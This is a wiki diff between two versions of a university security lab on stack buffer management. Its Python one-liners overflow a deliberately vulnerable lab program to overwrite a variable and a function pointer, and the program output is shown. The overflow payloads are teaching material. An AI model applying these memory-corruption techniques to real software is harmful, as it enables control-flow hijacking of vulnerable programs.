Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-03 [2020/10/25 15:33] mihai.dumitru2201 [3. Off-by-one Overflow] |
cns:labs:lab-03 [2022/10/24 19:05] (current) mihai.dumitru2201 [2. Overflow a Pointer] |
||
|---|---|---|---|
| Line 84: | Line 84: | ||
| ==== 1. Assembly Function Calls ==== | ==== 1. Assembly Function Calls ==== | ||
| - | Enter the ''asm-function-call/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> | + | Enter the ''01-asm-function-call/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> |
| student@host:~/cns/labs/03-stack-buffer-management/01-asm-function-call $ ls | student@host:~/cns/labs/03-stack-buffer-management/01-asm-function-call $ ls | ||
| Makefile function_call.asm | Makefile function_call.asm | ||
| Line 113: | Line 113: | ||
| ==== 2. Overflow a Pointer ==== | ==== 2. Overflow a Pointer ==== | ||
| - | Enter the ''owerflow-ptr/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> | + | Enter the ''02-owerflow-ptr/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> |
| student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ls | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ls | ||
| Makefile overflow_ptr.c | Makefile overflow_ptr.c | ||
| Line 134: | Line 134: | ||
| Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code> | Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code> | ||
| - | python -c 'print(16*"A")' | ./overflow_ptr | + | python -c 'import sys; sys.stdout.buffer.write(16*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x12345678. | Provide buffer input: Dumb number value is 0x12345678. | ||
| Buffer is AAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAA | ||
| Line 143: | Line 143: | ||
| Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code> | Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code> | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(30*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(30*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x12345678. | Provide buffer input: Dumb number value is 0x12345678. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(35*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(35*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x12345600. | Provide buffer input: Dumb number value is 0x12345600. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(36*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(36*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x1234000a. | Provide buffer input: Dumb number value is 0x1234000a. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Line 167: | Line 167: | ||
| Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code> | Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code> | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(39*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(39*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x0a414141. | Provide buffer input: Dumb number value is 0x0a414141. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Line 173: | Line 173: | ||
| Let's see what happens if we overwrite more data, we write ''41'' bytes:<code> | Let's see what happens if we overwrite more data, we write ''41'' bytes:<code> | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(41*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(41*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x41414141. | Provide buffer input: Dumb number value is 0x41414141. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Line 186: | Line 186: | ||
| We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written). | We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written). | ||
| - | Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable:<code> | + | Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable: |
| - | $ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x00\x00\x00\x00\x21\x43\x65\x87")' | ./overflow_ptr | + | <code> |
| + | |||
| + | $ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x21\x43\x65\x87\x00\x00\x00\x00")' | ./overflow_ptr | ||
| Provide buffer input: Dumb number value is 0x87654321. | Provide buffer input: Dumb number value is 0x87654321. | ||
| Line 265: | Line 267: | ||
| *[[https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64|x64 stack frame tutorial]] | *[[https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64|x64 stack frame tutorial]] | ||
| - | *[[https://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/|x32 stack frame tutorial]] | + | *[[https://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/|x86 stack frame tutorial]] |
| *[[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]] | *[[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]] | ||
| * ''%%python -c 'import sys; sys.stdout.buffer.write(b"A" * 42 + b"\x44\x33\x22\x11")' | ./l33tb1n%%'' | * ''%%python -c 'import sys; sys.stdout.buffer.write(b"A" * 42 + b"\x44\x33\x22\x11")' | ./l33tb1n%%'' | ||
